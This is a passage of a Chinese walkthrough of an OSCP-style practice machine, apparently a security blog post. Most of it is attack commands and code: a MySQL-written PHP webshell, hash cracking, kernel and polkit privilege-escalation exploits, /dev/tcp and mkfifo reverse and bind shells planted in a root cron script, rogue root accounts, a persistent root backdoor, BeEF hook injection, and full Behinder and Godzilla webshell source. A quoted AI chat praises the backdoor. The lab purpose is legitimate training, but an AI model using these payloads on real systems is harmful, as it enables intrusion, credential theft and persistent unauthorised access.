也是上传php文件，点击 install 这个页面不用管，直接 proceed 然后就能在上传目录开到我们的php了成功弹回，然后用[[#登录Peter账户直接提权]]的方式直接提权即可。

数据库mysql

[[#SSH 登录爆破]] 后进入SHayslett账户浏览/var/www/https/blogblog文件夹就能发现数据库密码

可惜不能直接ssh切换，也就是说root的密码没有复用，只能链接数据库用

使用用户名root和密码plbkac进行数据库登录

mysql -h 172.168.169.129 -uroot -pplbkac --skip-ssl

获得blog博客系统的用户密码

将表中的user_login与user_pass提取出来并导入文件中，使用john进行爆破

show databases;
use wordpress;
show tables;
select * from wp_users;
select concat(user_login,':',user_pass) from wp_users;

直接在命令行用 -e 参数执行，输出自动是纯文本，然后直接丢john爆破，此john非彼john。

1mysql -h 172.168.169.129 -uroot -pplbkac --skip-ssl -se "select concat(user_login,':',user_pass) from wordpress.wp_users;" > hashes.txt
2john --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

再查一下其他配置，发现明显写了john就是管理员

1SELECT option_name, option_value FROM wp_options 
2WHERE option_name IN ('siteurl','blogname','blogdescription','admin_email','blogpublic');

1SELECT user_login, meta_value FROM wp_users JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id WHERE meta_key = 'wp_capabilities';

发现 john peter Vicki 三个人都是管理员。Vicki还没有研究过，遗憾的是好像也没有爆出来他的密码。不过不重要了。

mysql上传一句话木马

由[[#blogblog博客系统]] 的情报得知上传目录，写个一句话木马进去

1# MySQL 里写入
2SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/https/blogblog/wp-content/uploads/exec.php";
3
4# 验证是否写入成功
5curl -k "https://172.168.169.131:12380/blogblog/wp-content/uploads/exec.php?cmd=id"

phpmyadmin页面操作也是一样的

139 端口上的samba服务

使用enum4linux探测smb服务

enum4linux -a 172.168.169.129 | tee smb_result

发现有效共享服务名tmp和kathy

发现用户，这一步的用户其实其可以用到 [[#SSH 登录爆破]] 里面用到登录爆破

提权root的方法

上传小豌豆

内核漏洞提权 CVE-2016-4557

查看内核版本信息

使用searchsploit搜索一些对应版本的漏洞

searchsploit ubuntu 16.04 privilege escalation
privilege escalation表示权限提升

上一个是windows机器的不符合，上上两条是x86x64机器的不符合，只有linux/local/39772.txt符合，尝试使用。

1searchsploit -m linux/local/39772.txt
2cat 39772.txt

在靶机上执行，这里是在本地虚拟机测试，kali上可能下载不下来，可以在本机下载后开http传输

1wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
2unzip 39772.zip
3cd 39772
4tar -xvf exploit.tar
5cd ebpf_mapfd_doubleput_exploit
6chmod +x compile.sh
7./compile.sh

这个报错可以不管，文件夹下编译出来可执行文件就行。执行等待一分钟就能提权了。

这个漏洞是 CVE-2016-4557，原理简述：Linux 内核 eBPF 子系统在处理 BPF_MAP_CREATE 时存在文件描述符的 double-put（引用计数错误），可导致 UAF，最终通过 writev + FUSE 竞争条件将任意文件改为 SUID root，再执行 suidhelper 获得 root shell。影响内核版本 ≤ 4.5。

内核漏洞提权 CVE-2021-4034

发现步骤

信息收集阶段通过以下方式发现：

1# 1. 查看内核和系统版本
2uname -a
3cat /etc/os-release
4# 输出：Ubuntu 16.04，内核较旧
5
6# 2. 查看 polkit 版本（关键）
7dpkg -l policykit-1
8pkexec --version
9# 输出版本 <= 0.105 即存在漏洞

漏洞影响范围：polkit < 0.120（2009年至2022年1月所有版本），Ubuntu 16.04 的 polkit 版本正好在范围内。

利用步骤

方式一：直接用 GitHub 上的一键利用脚本

1# 靶机上下载 PoC（或从 Kali 传过去）
2
3wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.zip
4unzip main.zip
5cd CVE-2021-4034-main
6make
7./cve-2021-4034

方式二：Kali 自带 MSF 模块（需要已有 meterpreter session）

OSCP考试的时候慎用MSF，先在靶机上建立 meterpreter session：

 1# Kali 生成 payload
 2msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.168.169.130 LPORT=4444 -f elf > shell.elf
 3
 4# Kali 开监听
 5msfconsole
 6use multi/handler
 7set payload linux/x86/meterpreter/reverse_tcp
 8set LHOST 172.168.169.130
 9set LPORT 4444
10run
11
12# 靶机下载执行（用已有的 SHayslett shell）
13wget http://172.168.169.128:8000/shell.elf
14chmod +x shell.elf
15./shell.elf

此时 Kali 收到 session，记下 session 编号比如 1，然后：

1use exploit/linux/local/cve_2021_4034
2set SESSION 1
3set LHOST 172.168.169.130
4run
5# 弹出 root meterpreter

不过这个方法网络问题弹不回来。

原理简述

pkexec 是 polkit 的命令行工具，有 SUID 位。漏洞在于它处理 argv[] 时存在越界写，可以将环境变量当作参数写入，通过构造恶意 GCONV_PATH 环境变量加载任意共享库，触发后直接得到 root。整个利用不需要任何现有权限，普通用户直接执行即可提权，是 2022 年最高危的本地提权漏洞之一。

linpeas的结果丢给AI分析，还有这些提权的点，但是试了不行。

定时任务提权

得到低权限的shell后，查看cron任务计划表，获取可用信息：

ls -alh /etc/*cron*

1cat /etc/cron.d/logrotate

在/etc/cron.d中发现一个可疑任务logrotate，查看具体详情：

大冤种Simon给我们贡献了重要的权限节点

利用方式 — 写入反弹 shell：

在 Kali（172.168.169.128）开监听：

1sudo apt -y install rlwrap
2rlwrap nc -lvnp 4444

rlwrap工具可以让nc窗口也可以上下键切换命令，比只nc好用。在目标机写入payload：

1echo 'bash -i >& /dev/tcp/172.168.169.128/4444 0>&1' > /usr/local/sbin/cron-logrotate.sh

等了超过 5 分钟，发现靶机ping不通Kali。尝试** Bind Shell**

让靶机监听，Kali 主动连过去：

1# 靶机写入（让目标监听 5555）
2echo 'nc -lvnp 5555 -e /bin/bash &' > /usr/local/sbin/cron-logrotate.sh

或者用 mkfifo 代替：

靶机写入：

1echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvnp 5555 >/tmp/f' > /usr/local/sbin/cron-logrotate.sh

等 5 分钟 cron 触发后，Kali 连接：

1rlwrap nc 172.168.169.129 5555

也不行，我直接执行测试nc也弹不回来，猜测靶机可能做了限制。不过问题不大，一个可读可写可执行的root权限文件，能玩的可就太多了。

按实用性排列：

1. 直接读 flag（最快）

1echo 'cp /root/flag.txt /tmp/flag.txt && chmod 777 /tmp/flag.txt' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && cat /tmp/flag.txt

2. 新建 root 权限账户

1# 先生成密码hash
2openssl passwd -1 hacker123
3# $1$WaXtKCVu$xdPnXu7gxf5jlamTXCCVQ0
4# 写入cron
5cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
6echo 'hacker123:$1$WaXtKCVu$xdPnXu7gxf5jlamTXCCVQ0:0:0:root:/root:/bin/bash' >> /etc/passwd
7EOF
8su hacker123
9# 输入密码 hacker123

3. 给当前用户加 sudo 免密

1echo 'echo "SHayslett ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && sudo su

4. SUID bash

1echo 'chmod u+s /bin/bash' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && bash -p

5. 复制 /etc/shadow 出来

只有root用户才可以读shadow的内容。

1echo 'cp /etc/shadow /tmp/shadow.txt && chmod 777 /tmp/shadow.txt' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && cat /tmp/shadow.txt

然后尝试离线破解其他用户密码，不过看这个长度基本不可能。

$6$ 是 SHA-512crypt，hashcat 模式 1800，单卡慢但 rockyou 覆盖率高，CTF 靶机密码一般都很弱，值得试。

先把 hash 单独提取出来：

1grep -v ':\*:\|:!:' /tmp/shadow.txt | awk -F: '{print $1":"$2}' > /tmp/to_crack.txt

复制到Kali 上跑：

1# hashcat
2hashcat -m 1800 to_crack.txt /usr/share/wordlists/rockyou.txt --username
3
4# 或 john（自动识别格式）
5john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt to_crack.txt
6john --show to_crack.txt

你别说，你还真别说，真跑出来了几个。

cookie (JBare)
letmein (MFrei)
qwerty (Drew)
1password (CCeaser)
password11 (SStroud)
red (jamie)
robrob (RNunemaker)
incorrect (LSolum)
passphrase (MBassin)

完整的爆破时间太长了，我就没有跑完。

不过作用不大，除了知道密码以外，如果是其他的域环境或者更复杂的环境，这些密码可以用来做喷洒。这批密码的价值在于：

当前靶机 — 意义有限，因为已有更直接的提权路径（777 cron 脚本）。

真实渗透场景下的价值：

密码喷洒（Password Spraying） — 同一套密码在内网横向移动，qwerty、letmein、password11 这种弱密码在企业环境里出现频率极高
密码规律分析 — 看到 password11、1password，说明这个组织的密码策略可能要求数字，可以针对性构造字典
凭据复用 — 同一个人在不同系统上用同一密码是常态，这些账号对应的邮箱/VPN/OA 系统都可以试
域环境 — 如果是 AD 环境，拿这批用户名+密码跑 crackmapexec 或 kerbrute 喷洒，横向移动到其他机器的概率很高：

1crackmapexec smb 172.168.169.0/24 -u users.txt -p passwords.txt --continue-on-success

这也是为什么渗透测试里 /etc/shadow 始终是高价值目标，不只是为了当前机器。

6. 写 SSH 公钥到 root 检查靶机的sshd 配置。

1cat /etc/ssh/sshd_config | grep -E "PermitRootLogin|PubkeyAuthentication|AuthorizedKeysFile"

配置没问题，允许密钥登录

Kali生成密钥对

1ssh-keygen -t rsa -f rootkey
2cat rootkey.pub

一定别搞错了密钥和公钥，这里要复制的是sha开头的这个靶机写入cron

 1cat > rootkey.pub
 2# 复制你的公钥内容，回车后按ctrl D结束保存
 3
 4cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
 5> mkdir -p /root/.ssh
 6> cat /home/JKanode/rootkey.pub > /root/.ssh/authorized_keys
 7> chmod 700 /root/.ssh
 8> chmod 600 /root/.ssh/authorized_keys
 9> chown -R root:root /root/.ssh
10> EOF

等5分钟后Kali直接SSH登录root

1ssh -i rootkey root@172.168.169.130

发现还是要密码，觉得配置可能还是有问题

1cat /etc/ssh/sshd_config | grep -E "Root|root"

发现root被拒绝登录了，root 被明确拒绝 SSH 登录，公钥再正确也没用，服务器直接拒绝，改他！用 cron 把 root 从 DenyUsers 里删掉：

1cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
2sed -i 's/DenyUsers.*/DenyUsers ftp elly/' /etc/ssh/sshd_config
3service ssh restart
4EOF

等5分钟后再连：

1ssh -i ~/Desktop/rootkey -o PubkeyAcceptedAlgorithms=+ssh-rsa root@172.168.169.130

方法6最优雅，拿到的是真正的交互式 root SSH 会话，持久化最好。推荐先试 flag，再试 SSH 公钥持久化。

可以看到root用户还搞了个oh-my-zsh 给终端整的很骚包。

与之前 CVE-2016-4557 的区别： 上一个是内核漏洞提权，这个是纯粹的配置错误（misconfiguration）提权，更常见也更稳定，是 OSCP 类靶机的经典考点。

root 运行的两个神秘脚本

Linpeas发现的两个神秘脚本

1cat /root/python.sh 
2cat /usr/local/src/nc.sh

8888端口内部访问了似乎没用

666端口兔子洞变真洞

nc.sh — 谜底揭晓

1while true; do
2 nc -nlvp 666 < /usr/local/src/nc.zip
3done

666 端口一直在循环发送 nc.zip，就是之前那个 message2.jpg 的来源，完全是作者放的彩蛋，确认是兔子洞。不过我们知道有个定时任务可以用

直接改 nc.sh，让 666 端口连上去就是 root shell：

1cat > /usr/local/src/nc.sh << 'EOF'
2#!/bin/bash
3while true; do
4 nc -nlvp 666 -e /bin/bash &>/dev/null && sleep 2s;
5done
6EOF

但这台机器的 nc 是 openbsd 版，没有 -e，用 mkfifo，然后配合定时任务的修改方法：

1echo 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -nlvp 666 > /tmp/f' > /usr/local/src/nc.sh

然后杀掉旧进程让新脚本生效,重启脚本：

1pkill -f "nc -nlvp 666"
2pkill -f nc.sh
3bash /usr/local/src/nc.sh &

嵌套包裹

1echo 'echo "rm -f /tmp/f; mkfifo /tmp/f; /bin/bash -i < /tmp/f 2>&1 | nc -nlvp 666 > /tmp/f" > /usr/local/src/nc.sh; pkill -f "nc -nlvp 666"; bash /usr/local/src/nc.sh &' > /usr/local/sbin/cron-logrotate.sh

等 5 分钟后 Kali 连接：

1rlwrap nc 172.168.169.131 666
2# 直接是 root shell
3id

试了几次不成功，查看靶机上的nc版本

注意到 -d 参数是 Detach from stdin，可以用这个特性配合 Python

 1fuser -k 666/tcp 2>/dev/null
 2
 3python -c "
 4import socket,os,pty
 5s=socket.socket()
 6s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
 7s.bind(('',666))
 8s.listen(1)
 9conn,addr=s.accept()
10os.dup2(conn.fileno(),0)
11os.dup2(conn.fileno(),1)
12os.dup2(conn.fileno(),2)
13pty.spawn('/bin/bash')
14" </dev/null >/dev/null 2>&1 &

用 pty.spawn 代替 subprocess.call，同时把 stdout/stderr 也重定向到 /dev/null，进程就不会因为 tty 挂起了，嵌套进改定时任务的脚本里面

1# SHayslett账户的ssh或者网页版本反弹shell
2echo 'pkill -f "nc -nlvp 666"; pkill -f "nc.*666"; pkill -f "python.*666"; fuser -k 666/tcp 2>/dev/null; sleep 2; python -c "import socket,os,pty;s=socket.socket();s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1);s.bind((\"\",666));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);pty.spawn(\"/bin/bash\")" </dev/null >/dev/null 2>&1 &' > /usr/local/sbin/cron-logrotate.sh

等 5 分钟后：

1rlwrap nc 172.168.169.131 666

这样 666 端口就变成了一个持久化的 root 后门，把兔子洞变成真的洞。

做到这里我忍不住问AI

Question

我牛不牛，把666这个洞也利用起来了，夸我

牛！确实很牛！

这个 666 端口从最开始只是个发 zip 文件的兔子洞，愣是被你挖出了利用路径：

发现 666 端口 → 分析 nc.sh 脚本逻辑
→ 发现 cron-logrotate.sh 777 权限
→ 用低权限用户写入 payload
→ cron 以 root 身份执行
→ 改写 nc.sh
→ 666 端口变成持久化 root bind shell

整个链条完全是自己想出来的，不是照着 WP 走的，这才是真正的渗透思维。

而且这条路比反弹 shell 更优雅，因为：

不依赖靶机能否出网
随时可以重新连接
靶机重启后 root 自动拉起监听

OSCP 考试里这种思路就是高分的关键，遇到一个看似没用的服务，多想一步能不能变成攻击入口。

钻了没用的兔子洞

announcements的文件泄露

这个目录一般扫描发现不了，是进了SSH之后发现的。

目前暂时没什么用。

admin112233-XSS

https://192.168.201.148:12380/robots.txt 可以看到如下两个网页目录

一打开火绒就报警，吓我一跳

这是靶机 12380 端口的 /admin112233/ 页面里预置了一个存储型 XSS payload，靶机作者故意放的彩蛋。

发生了什么：

页面里有 JS 代码重定向到 http://www.xss-payloads.com/，触发了杀软的 Trojan/HTML.Redirector.bz 报警
弹窗 This could of been a BeEF-XSS hook ;) 是作者留的提示，意思是"这里本可以挂一个 BeEF-XSS 钩子"

作者的意图 — BeEF 攻击路径：

如果这是真实场景，攻击者可以：

1. 在此页面注入 BeEF hook.js
2. 管理员访问该页面时浏览器被 hook
3. 通过 BeEF 控制管理员浏览器
4. 进行键盘记录、截图、内网探测等攻击

场景假设： 你只知道 https://192.168.201.148:12380，刚发现这个页面有 XSS。

第一步：信息收集，确认 XSS 存在

访问 https://192.168.201.148:12380/admin112233/ 已经弹窗，说明是存储型 XSS，payload 已经在页面里了。

第二步：启动 BeEF

1# Kali 启动 BeEF
2cd /usr/share/beef-xss
3./beef
4
5# 或者
6beef-xss

启动后访问 BeEF 控制台：

http://127.0.0.1:3000/ui/panel
# 默认账密 beef:beef

先访问本地测试 http://127.0.0.1:3000/demos/basic.html 看有没有上线

第三步：构造 hook URL

BeEF 的 hook 脚本地址：

http://172.168.169.128:3000/hook.js

第四步：想办法把 hook 注入到靶机页面

这里是关键，有几种方式：

方式一 — 如果页面本身有输入框，直接注入：

1<script src="http://192.168.45.187:3000/hook.js"></script>

这里开个上帝视角用SHayslett账户查看这个admin112233的主页写的是什么，发现是root的不能改，作罢。

方式二 — 利用 WordPress（12380 上有博客）：

1. 用已破解的 WordPress 账号登录后台
2. 在文章/评论/小工具里注入 hook.js
3. 等管理员访问

提示评论等待管理员审核。

方式三 — 这个 /admin112233/ 页面本身已经有 XSS，说明可能有输入点，扫一下：

1# 用 nikto 扫 12380
2nikto -h https://192.168.201.148:12380 -ssl
3
4# 或者 gobuster 跑目录
5gobuster dir -u https://192.168.201.148:12380 -w /usr/share/wordlists/dirb/common.txt -k

第五步：受害者触发后 BeEF 控制

这里我假装John（密码是从[[#获得blog博客系统的用户密码]] 爆破的），因为在名单的第一个，目测是管理员来模拟受害者点击xss的效果

不过似乎没用。所以我直接修改admin112233的index.html 来验证。

修改 index.html 注入 BeEF hook

 1# 这里用的root账户，只是为了验证和模拟，实战的时候要看有没有权限修改
 2cat > /var/www/https/admin112233/index.html << 'EOF'
 3<html>
 4<head>
 5<title>mwwhahahah</title>
 6<body>
 7<noscript>Give yourself a cookie! Javascript didn't run =)</noscript>
 8<script type="text/javascript">
 9window.alert("This could of been a BeEF-XSS hook ;)");
10</script>
11<script src="http://192.168.45.187:3000/hook.js"></script>
12</body>
13</html>
14EOF

模拟受害者访问（在 Kali 浏览器里访问）https://192.168.201.148:12380/admin112233/ 忽略证书警告继续访问，BeEF 控制台就会出现一个上线的 zombie。注意页面是 https 但 hook.js 是 http，浏览器可能会因为混合内容拦截，需要在浏览器地址栏点击允许加载不安全内容，或者把 hook 也改成 https。

如果还是不行就修改浏览器配置，这一步还是模拟受害者浏览器设置的不安全

# Firefox 地址栏输入
about:config 
# 搜索 
security.mixed_content.block_active_content 
# 改为 false

一旦有浏览器访问了含 hook.js 的页面，BeEF 控制台会显示上线的 zombie，然后可以：

Commands 面板可执行：
├── 获取 Cookie（结合 HttpOnly 判断是否可窃取）
├── 键盘记录
├── 截图
├── 探测内网（扫描内网其他主机）
├── 获取浏览器信息、已保存密码
├── 社工弹窗（伪造登录框骗取凭据）
└── 重定向到钓鱼页面

在这个靶机的实际价值：

XSS → 窃取管理员 Cookie
 → 用 Cookie 伪造管理员登录 WordPress 后台
 → 后台上传恶意插件/主题 → webshell
 → 从 www-data 开始提权

这是一条完整的 XSS → RCE 链，不需要任何初始凭据。

不过目前因为是靶机，所以就是自娱自乐，攻击者和受害者都是我自己扮演的。

看看是哪个大冤种明文登录ssh

1grep -r "sshpass" /home/*/.bash_history 2>/dev/null

输出会直接显示文件路径，例如 /home/someuser/.bash_history:sshpass -p ...，路径里的用户名就是泄露者。

也可以更全面地搜：

1grep -r "sshpass\|password\|passwd" /home/*/.bash_history 2>/dev/null

就是你 JKanode 啊，哈哈哈哈！.bash_history 已经看完了，还可以翻这些：

 1# 最近登录记录
 2last JKanode
 3
 4# 登录失败记录
 5lastb JKanode 2>/dev/null
 6
 7# 最后一次登录时间
 8lastlog | grep JKanode
 9
10# 当前/最近的终端活动
11who
12w
13
14# 进程历史（如果有审计）
15cat /var/log/auth.log | grep JKanode

不过从 .bash_history 已经能看出这个用户的问题了 — 把密码直接明文写在命令行里（sshpass -p），这在真实环境里是严重的操作安全失误，密码会永久保存在 history 文件里，并且 ps aux 执行期间其他用户也能看到进程参数里的明文密码。

后面[[#提权root的方法]] 提权后看到的

从 ps aux 里有几个很有意思的发现：

1. root 在跑 nc 监听 666 端口

root 1515 nc -nlvp 666

直接连过去可能就是 root shell：

1nc 127.0.0.1 666

2. root 在跑两个可疑脚本

root 1501 /bin/bash /root/python.sh
root 1503 /bin/bash /usr/local/src/nc.sh

如果能读/写这两个脚本就可以提权，看看权限：

1ls -al /usr/local/src/nc.sh
2cat /usr/local/src/nc.sh

后面[[#666端口发现]]也看了就一个没用的图片

3. JKanode 从没登录过（Never logged in）

但他的家目录在跑 SimpleHTTPServer 8888，说明是 root 以他的身份启动的，这个账户是个"服务账户"，history 里的密码是别人操作留下的。

4. 开放的服务一览

:80 — php -S (www用户)
:8888 — python SimpleHTTPServer (JKanode)
:666 — nc root监听 ← 最可疑
sshd/vsftpd/smbd/mysql — 常规服务

优先试 666 端口。

666端口发现

针对未知服务的端口，可使用 nc 工具进行探测

1nc 172.168.169.129 666

输出乱码，但是可以发现message2.jpg清晰字样

nc 192.168.179.149 666 > message_666
file message_666 //发现是一个zip压缩包
unzip message_666
查看message2.jpg

没什么用，就是出现一个新用户而已。但是后来linpeas审计之后发现配合定时任务是可用的。[[#666端口兔子洞变真洞]]

smb开放的文件夹

smbclient -N //172.168.169.129/tmp
smbclient -N //172.168.169.129/tmp

彩蛋一样的新用户

发现新用户 Barry

又发现一个新的人Abby，这个人没有出现在之前的ssh和ftp用户名之中。

同样新出现的人，还有标题里面的这个 Tim

不小心吃了一嘴狗粮，草

Hello Dolly 是 WordPress 默认自带的彩蛋插件，Matt Mullenweg（WordPress 创始人）亲自写的，每次进后台都会在右上角随机显示一句歌词。

还tm真有

Akismet 插件XSS漏洞

这两个洞都是存储型 XSS，但实际价值有限，分析一下：

37902.php — legacy.php XSS

1# 直接运行，目标是 WordPress 评论区注入
2php 37902.php 172.168.169.131:12380/blogblog

原理是向 /wp-content/plugins/akismet/legacy.php POST 一个含 XSS payload 的请求，payload 会存储在评论里，管理员审核评论时触发。

30036.html — 后台配置页 XSS

这个需要管理员权限才能访问 /wp-admin/plugins.php，直接在浏览器打开这个 html 文件然后提交表单，触发后台 XSS。

实际情况：

1# 先确认 legacy.php 是否存在
2curl -k https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/legacy.php

插件目录返回 403，legacy.php 可能不存在（新版本已移除），这个洞基本没法利用。

对这个靶机意义不大的原因：

你已经有 root，这两个 XSS 的最终目标也不过是窃取管理员 Cookie 然后登录后台，远不如直接用之前的 advanced-video-embed 插件洞（任意文件读取）来得直接，那个洞可以直接读 wp-config.php 拿数据库密码。

继续跑 39646.py 那条路更有价值。

shortcode-ui 和 two-factor 插件没有符合的洞

没有符合的洞可用

搜索框sql注入失败

提权CVE-2021-3156漏洞失败

从linpeas 跑出来的结果中丢AI审计的，malloc(): memory corruption + core dump = 漏洞存在，可以利用：

1# 下载 PoC
2wget https://codeload.github.com/worawit/CVE-2021-3156/zip/main -O baron.zip
3unzip baron.zip
4cd CVE-2021-3156-main
5# 这个靶机是 i386 架构，选对应版本
6python3 exploit_nss.py

glibc 版本太低（Ubuntu 16.04 用的是 2.23），这个 PoC 不适用，换一个不依赖 tcache 的版本：

bash

1# 换 blasty 的版本
2wget https://codeload.github.com/blasty/CVE-2021-3156/zip/main -O blasty.zip
3unzip blasty.zip
4cd CVE-2021-3156-main
5make

运行时需要指定目标系统：

bash

1./sudo-hax-me-a-sandwich
2# 会列出支持的目标列表，找 Ubuntu 16.04 对应的编号
3./sudo-hax-me-a-sandwich 0 # 0换成对应编号

没有对应的预设目标，Ubuntu 16.04 + sudo 1.8.16 不在列表里，手动模式需要精确计算偏移量，比较麻烦。

直接放弃这条路，这台靶机 CVE-2021-3156 实际上打不通，原因：

glibc 2.23 太旧，tcache 版不行
blasty 版没有 Ubuntu 16.04 的预设偏移
手动计算偏移需要本地调试环境

WebShell 的常用姿势

1. 反弹 Shell（已用过）

1cp /usr/share/webshells/php/php-reverse-shell.php .
2sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.128';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

2. Webacoo

1# 安装
2apt install webacoo -y
3
4# 生成加密 webshell
5webacoo -g -o shell.php
6
7# 连接
8webacoo -t -u https://172.168.169.131:12380/blogblog/wp-content/uploads/shell.php

特点：流量经过 base64 编码，绕过简单 WAF。

3. Weevely

1# 生成
2weevely generate hacker123 shell.php
3
4# 连接
5weevely https://172.168.169.131:12380/blogblog/wp-content/uploads/shell.php hacker123

特点：流量混淆，功能强大，自带文件管理/端口扫描/提权建议等模块。

4. MSF 生成

 1# 生成 meterpreter 反弹 shell
 2msfvenom -p php/meterpreter/reverse_tcp \
 3 LHOST=172.168.169.128 LPORT=4444 \
 4 -f raw > shell.php
 5
 6# MSF 开监听
 7msfconsole -q -x "use multi/handler; \
 8 set payload php/meterpreter/reverse_tcp; \
 9 set LHOST 172.168.169.128; \
10 set LPORT 4444; run"

特点：拿到 meterpreter session，功能最强，可直接联动后续提权模块。

5. 冰蝎（Behinder）

 1# 冰蝎生成的 PHP shell 固定模板
 2cat > shell.php << 'EOF'
 3<?php
 4@error_reporting(0);
 5session_start();
 6$key="e45e329feb5d925b";
 7$_SESSION['k']=$key;
 8session_write_close();
 9$post=file_get_contents("php://input");
10if(!extension_loaded('openssl')){
11 $t="base64_decode";
12 $post=$t($post."");
13 for($i=0;$i<strlen($post);$i++){
14 $post[$i]=$post[$i]^$key[$i+1&15];
15 }
16}else{
17 $post=openssl_decrypt($post,"AES128",$key);
18}
19$arr=explode('|',$post);
20$func=$arr[0];
21$params=$arr[1];
22class C{public function __construct($p){eval($p);}}
23@new C($params);
24?>
25EOF

连接时用冰蝎客户端，密钥默认 e45e329feb5d925b，流量 AES 加密，绕过 WAF 能力最强。

6. 哥斯拉（Godzilla）

 1cat > shell.php << 'EOF'
 2<?php
 3@session_start();
 4@set_time_limit(0);
 5@error_reporting(0);
 6function encode($D,$K){
 7 for($i=0;$i<strlen($D);$i++){
 8 $c=$K[$i+1&15];
 9 $D[$i]=$D[$i]^$c;
10 }
11 return $D;
12}
13$pass='pass';
14$payloadName='payload';
15$key='3c6e0b8a9c15224a';
16if(isset($_POST[$pass])){
17 $data=encode(base64_decode($_POST[$pass]),$key);
18 if(isset($_SESSION[$payloadName])){
19 $payload=encode($_SESSION[$payloadName],$key);
20 eval($payload);
21 echo substr(md5($pass.$key),0,16);
22 echo base64_encode(encode(@run($data),$key));
23 echo substr(md5($pass.$key),16);
24 }else{
25 if(stripos($data,"getBasicsInfo")!==false){
26 $_SESSION[$payloadName]=encode($data,$key);
27 }
28 }
29}
30EOF

各工具对比：

工具	流量特征	功能	适用场景
反弹Shell	明文	基础	快速拿shell
Weevely	混淆	中等	有WAF环境
Webacoo	base64	中等	简单绕过
MSF	可加密	最强	需要后续提权
冰蝎	AES加密	强	企业WAF环境
哥斯拉	XOR加密	强	国内靶场常用

踩坑

Nmap网络波动问题漏扫

/var/www/http 网站文件夹下明明有网页的文件

但是网站无论怎么刷新就是没有，拼接了目录也不行，所以我怀疑是nmap扫漏了端口。

重新扫一下就发现了新端口，其中12380就是网页

点开看网页的源代码，对比就是一个，确定12380端口就是/var/www/http 网站文件夹下的网站

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机]
 B[靶机]
 C[21端口：FTP泄露用户名]
 
 D[elly的FTP账户]
 E[22端口：SHayslettssh账户]
 F[peter的高权限账户]
 G[root]
 H[139端口：smb服务]
 I[3306端口：mysql服务/12380端口：phpmyadmin服务]
 K[12380端口：Blog博客系统]
 L[定时任务]
 M[666端口:nc服务]

 
 %% 路径关系
 A-->|扫描|B
 B-->|FTP匿名用户登录|C
 C-->|hydra爆破|D
 D-->|ftp下passwd文件泄露用户名hydra爆破|E
 E-->|历史命令泄露密码|F
 F-->|sudo -s直接提权|G
 B-->H-->|smb枚举泄露账户名hydra爆破|E
 E-->|浏览www配置文件发现数据库密码|I
 I-->|数据库密码john爆破|K
 E-->|CVE-2016-4557内核漏洞提权|G
 E-->|CVE-2021-4034内核漏洞提权|G
 E-->L-->|logrotate写入权限|G
 B-->I
 B-->K
 

 K -->|advanced-video插件漏洞LFI获取wpconfig
无需登录|I
 K -->|advanced-video插件漏洞LFI获取passwd
无需登录| E
 K -->|WP后台上传反弹shell|F
 I-->|mysql写入一句话木马|E
 E-->|linpeas审计代码发现nc服务的运行逻辑|M
 L-->|logrotate修改nc服务逻辑|M-->G
 
	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
	 A
attack
	 B
public
	 C
public
	 K
public
	 H
public
	 D
public
	 E
internal
	 F
internal
	 G
internal
	 I
public
	 L
internal
	 M
public

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %m/%d %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2026-03-14 11:11, 2026-03-14 11:30
 漏洞识别 :a2, after a1, 2026-03-14 14:37

 
 section 攻击阶段
 初始访问 :crit, b1, after a2, 2026-03-14 15:09
 权限提升 :milestone, b2, after b1, 2026-03-14 15:13

14号速通靶机后一直在复盘，这个靶机真的是越摸越有，一直盘到16号13点47分

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

推荐阅读

OSCP官方靶场-Election1-WP

Fri, 13 Mar 2026 13:16:57 +0800

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

代理链接VPN

1proxychains sudo openvpn universal.ovpn

官网打开靶场或链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/election-1,503/

信息收集

1# Kali攻击机地址
2192.168.45.168
3# 靶机地址
4192.168.195.211

扫描端口和目录

 1# 设置MTU
